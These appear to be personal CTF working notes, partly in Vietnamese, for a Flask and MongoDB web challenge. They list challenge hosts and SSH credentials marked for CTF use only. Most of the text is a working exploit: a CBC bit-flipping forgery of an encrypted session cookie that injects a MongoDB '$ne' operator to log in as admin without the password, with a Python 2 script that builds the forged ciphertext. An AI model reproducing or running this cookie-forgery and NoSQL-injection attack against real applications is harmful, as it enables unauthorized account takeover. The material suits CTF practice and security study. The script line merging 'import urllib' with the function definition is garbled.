
Server : http://54.64.164.100:5555/
Script : http://binary.grayhash.com/2a0182588cf5550cebb49876d94c7a2f/index.py

- option : please check the notice board.
==========================================

mongoserver 128.199.123.177
user ssh: ctf/forctfonly
install local 
pip install flask
pip install pymongo


Ban dau:
{"u": "xxxxx", "pw": "aaaaaaaaaabbbbbbbbbbbbbbbbc,cpwc:cc$nec:1"}
Thay doi:
{"u": "xxxxx", " -> {"u": "admin", "
c,cpwc:cc$nec:1" -> ","pw":{"$ne":1}
=>
{"u": "admin", "pw": "aaaaaaaaaa????????????????","pw":{"$ne":1}}

iv b1 b2 b3 b4 pad
iv c1 c2 c3 c4 cpad
control b1, b4
b1 = d(c1) ^ iv  
b4 = d(c4) ^ c3

niv = nb1 ^ b1 ^ iv
nc3 = nb4 ^ b4 ^ c3


g.db.users.find_one(get_cookie())
g.db.videos.find({"user": g.user["u"]})

vid = {}
vid["title"] = request.form.get("title")
vid["vid"] = request.form.get("vid")
vid["user"] = g.user["u"]

g.db.videos.insert(vid)




python code:
import urllibdef xs(s1,s2):    
    return ''.join(chr(ord(a) ^ ord(b)) for a,b in zip(s1,s2))
cipher = 'EJ6WRUjJxWV0fCEFlWXzFq4pNh3+dFIXk2yhAMOBlHJpTk8U5/y8+UG+rUvghW/EMP9BQyRza0czOPYxrZORPILbp257ldaI1nG6vUkQnMaEkgwgjIyNmh9I+Qs/Iy6o'
cipher=cipher.decode('base64')
print 'Len cipher: %d' % len(cipher)
b1 = '{"u": "xxxx1", "'
nb1 = '{"u": "admin", "'
iv = cipher[0:16]

b4 = 'c,cpwc:cc$nec:1"'
nb4 = '","pw":{"$ne":1}'
c3 = cipher[48:48+16]

niv = xs(b1, xs(nb1,iv))
nc3 = xs(b4, xs(nb4,c3))

ncipher = niv + cipher[16:48] + nc3 + cipher[48+16:]
print 'Len ncipher: %d' % len(ncipher)
ncipher = ncipher.encode('base64')
print ncipher


